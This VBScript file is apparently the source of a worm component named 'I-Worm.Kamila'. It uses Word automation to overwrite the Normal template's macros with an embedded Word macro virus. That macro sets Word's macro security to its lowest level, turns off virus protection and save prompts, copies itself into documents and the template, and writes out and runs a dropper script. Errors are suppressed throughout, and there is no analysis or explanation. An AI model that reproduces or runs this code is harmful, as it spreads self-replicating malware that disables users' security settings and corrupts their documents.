Option Explicit
On Error Resume Next 'Keine Fehler!!!

Dim fso, wshShell
Dim strReg
Const tempReg="HKLM\Security\Provider\" 'do not change this

Sub Sleep(seconds)
	On Error Resume Next
	Dim a1,a2
	a1=Hour(Now)*3600+Minute(Now)*60+Second(Now)
	a2=a1
	While (a2-a1<seconds)
		a2=Hour(Now)*3600+Minute(Now)*60+Second(Now)
	Wend
End Sub

Function MakeCopy()
	On Error Resume Next 'Keine Fehler!!!
	Dim fileDll
	Dim strIn, strRes
	Set fileDll=fso.OpenTextFile(wshShell.RegRead(strReg) & "." & wshShell.RegRead(strReg & "Vars\%DLL_EXT%"),1)
	While Not fileDll.AtEndOfStream
		strIn=fileDll.ReadLine
		strRes=strRes & "'" & strIn & vbCrLf
	Wend
	MakeCopy=strRes
	fileDll.Close
	Set fileDll=Nothing
End Function

Function MakeDOCBody()
	On Error Resume Next 'Keine Fehler!!!
	Dim file1
	Dim strIn, strBody, strCode, strRes
	
	strBody=MakeCopy()
	Set file1=fso.OpenTextFile(WScript.ScriptFullName,1)
	While Not file1.AtEndOfStream
		strIn=file1.ReadLine
		If UCase(strIn)="'<--W97M-->" Then
			strIn=file1.ReadLine
			While UCase(strIn)<>"'<--/W97M-->"
				If strIn="''<BODY>" Then
					strRes=strRes & Right(strIn,Len(strIn)-1) & vbCrLf & strBody & vbCrLf
				Else
					strRes=strRes & Right(strIn,Len(strIn)-1) & vbCrLf
				End If
				strIn=file1.ReadLine
			Wend
		End If
	Wend
	file1.Close
	MakeDOCBody=strRes
	Set file1=Nothing
End Function

Sub InfectWord()
	On Error Resume Next 'Keine Fehler!!!
	Dim Word, Normal
	Set Word=WScript.CreateObject("Word.Application")
	Set Normal=Word.NormalTemplate.VBProject.VBComponents("ThisDocument")
	If Normal.CodeModule.Lines(1,1)="'I-Worm.Kamila" Then
		Dim i, n, k, t
		n=CInt(wshShell.RegRead(strReg & "Components\DOCInfector\Total files"))
		If n>0 Then
			k=Int(n*Rnd+1)
			For i=1 To k
				t=Int(n*Rnd+1)
				Word.Documents.Open wshShell.RegRead(strReg & "Components\DOCInfector\File" & t),False, , ,"a"
				Word.Documents(1).Save
				Word.Documents(1).Close
			Next
		End If
		Word.Quit
		WScript.DisconnectObject Word
		Set Word=Nothing
		Set Normal=Nothing
		Exit Sub
	End If
	Normal.CodeModule.DeleteLines 1,Normal.CodeModule.CountOfLines
	Normal.CodeModule.AddFromString MakeDocBody
	Word.NormalTemplate.Save
	Word.Quit
	WScript.DisconnectObject Word
	Set Word=Nothing
	Set Normal=Nothing
End Sub


Sleep(37)
Set fso=WScript.CreateObject("Scripting.FileSystemObject")
Set wshShell=WScript.CreateObject("WScript.Shell")
strReg=wshShell.RegRead(tempReg)
Call InfectWord()
WScript.DisconnectObject fso
WScript.DisconnectObject wshShell
Set fso=Nothing
Set wshShell=Nothing

'<--W97M-->
''I-Worm.Kamila
'
'Private Sub Document_Open()
'    On Error Resume Next
'    If ThisDocument.Type = wdTypeDocument And KamExTemp Then Exit Sub
'    If ThisDocument.Type = wdTypeTemplate And KamExDoc Then Exit Sub
'    With Dialogs(wdDialogFileSummaryInfo)
'        .Author = "I-Worm.Kamila"
'        .Subject = "I-Worm.Kamila"
'        .Comments = "Generated by I-Worm.Kamila"
'        .Execute
'    End With
'    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
'
'   With Options
'        .ConfirmConversions = False
'        .VirusProtection = False
'        .SaveNormalPrompt = False
'    End With
'    ActiveDocument.ReadOnlyRecommended = False
'    If KamExDoc And KamExTemp Then Exit Sub
'
'    If KamExDoc Then
'        ActiveDocument.VBProject.VBComponents("ThisDocument").Export "C:\kama.dll"
'        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1,NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
'        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\kama.dll"
'        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 4
'    ElseIf KamExTemp Then
'        NormalTemplate.VBProject.VBComponents("ThisDocument").Export "C:\kama.dll"
'        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1,ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
'        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\kama.dll"
'        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 4
'    End If
'    Kill "C:\kama.dll"
'    ActiveDocument.Save
'    NormalTemplate.Save
'    DropWorm
'End Sub
'
'Private Sub Document_Close()
'   Document_Open
'End Sub
'
'Private Function KamExDoc() As Boolean
'    On Error Resume Next
'    str1 = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1)
'    KamExDoc = (str1 = "'I-Worm.Kamila")
'End Function
'
'Private Function KamExTemp() As Boolean
'    On Error Resume Next
'    str1 = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1)
'    KamExTemp = (str1 = "'I-Worm.Kamila")
'End Function
'
'Private Sub DropWorm()
'    On Error Resume Next
'    Dim blYes As Boolean
'    Dim wsh As Object
'    blYes = False
'    Open "C:\kam_drop.vbs" For Output As #1
'    For i = 1 To ThisDocument.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
'        str1 = ThisDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(i, 1)
'        If str1 = "'<BODY>" Then
'            blYes = True
'            str1 = ""
'        ElseIf str1 = "'</BODY>" Then
'            blYes = False
'        End If
'        If blYes Then
'            Print #1, Right(str1, Len(str1) - 1) & vbCrLf
'        End If
'    Next i
'    Set wsh = CreateObject("WScript.Shell")
'    Close #1
'    wsh.Run "C:\kam_drop.vbs"
'    Set wsh = Nothing
'End Sub
'
'
''<BODY>
''</BODY>
'<--/W97M-->

